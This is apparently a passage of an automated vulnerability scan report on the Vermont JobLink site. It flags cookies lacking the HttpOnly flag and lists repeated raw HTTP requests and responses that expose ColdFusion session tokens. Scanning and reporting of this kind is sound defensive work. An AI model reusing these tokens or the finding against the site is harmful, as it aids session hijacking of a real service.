Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
4. Cookie without HttpOnly flag setpreviousnext There are 29 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
